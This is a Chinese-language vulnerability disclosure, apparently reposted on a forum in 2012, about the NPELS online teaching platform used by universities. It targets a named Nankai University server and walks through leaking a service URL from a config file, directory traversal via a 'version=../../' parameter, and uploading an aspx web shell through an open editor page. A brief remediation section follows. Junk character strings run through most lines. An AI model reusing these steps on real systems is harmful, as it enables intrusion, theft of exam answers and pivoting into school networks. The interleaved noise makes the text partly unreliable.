好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中& Q2 @" r$ I- X! K! A9 }
4 I, `4 E# d' C; P& z详细说明:
c- k% K1 x/ q: V X$ c3 r4 e4 k/ M$ ~
$ R& N2 W' R' q# K! L5 Q以南开大学的为例: $ v a/ Y0 h0 M
http://222.30.60.3/NPELS8 j3 W, p: w" b M5 W6 b+ s
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
9 O: y4 | V$ H4 M9 U<setting name="Update_CommonSvr_CommonService" serializeAs="String">
8 x; b* U" h1 a/ V8 O: X: ?) }- ^<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
' V; Y) P8 z0 z$ G, S) A, P: i</setting>1 i" m6 ?0 A3 L6 B
及版本号
; b8 L: K: O% C<add key="TVersion" value="1, 0, 0, 2187">
* _& l& @* S( f4 A1 R+ r1 q2 u</add>
o5 |/ f4 y- F& o直接访问
1 {4 [3 n+ a6 ?http://222.30.60.3/NPELS/CommonService.asmx" t) ^. V* K+ Y N( \9 P
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
: i3 ~9 {* E* l) Q" H! O Chttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187# o& J/ d* ], |) i x
进一步列目录(返回的网页很大,可以直接 wget 下来)
7 f$ C6 a6 ]3 \/ @2 x8 Ghttp://222.30.60.3/NPELS/CommonS ... List?version=../../6 v* z% D6 u3 i2 Q- `. a, L
' m( x# z$ j. p发现
! [) Y7 s, d% d" p, Y% Whttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm5 N' h8 j; ^: o6 V
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头: D7 y3 K3 W. j
上传后继续列目录找到木马地址直接访问即可0 |! h8 @3 Q5 G# }1 g1 T
! u1 M9 u( A* v6 WOOXX
7 j. s0 L7 f- ~: o1 K, D2 x6 `0 b : e0 R7 N& K: d1 X3 A
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法+ \8 z; M0 Y8 g9 ~4 Z4 V1 O3 A
漏洞证明:
Y# M8 v+ D$ G$ B0 \
0 t1 d/ @9 T. i' y9 |列目录:2 ?* Z/ ?" a! M5 E" V m
http://222.30.60.3/NPELS/CommonS ... List?version=../../2 ~. t' X/ x( y" P
文件上传:
7 N. ]2 R7 @6 g: @http://222.30.60.3/npelsv/editor/editor.htm
2 _$ n2 C; m- N9 Z7 r9 \
" c, y; Q) q p5 e上传木马:
3 ^2 q& V( x2 s' ~http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx1 y( i- L2 v' k# B, l- r
" } _& c( w4 h/ }
修复方案:% B0 q7 j" Z1 R& t& C2 Q
好像考试系统必须使用 CommonService.asmx
S* o0 u4 `3 B4 J# F最好配置文件加密或者用别的方式不让它泄露出来* S. t" H/ |. Y$ }
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
1 W6 q% P0 w+ c( p( I; H |
发表于 2012-12-4 11:10:29
收藏
支持
反对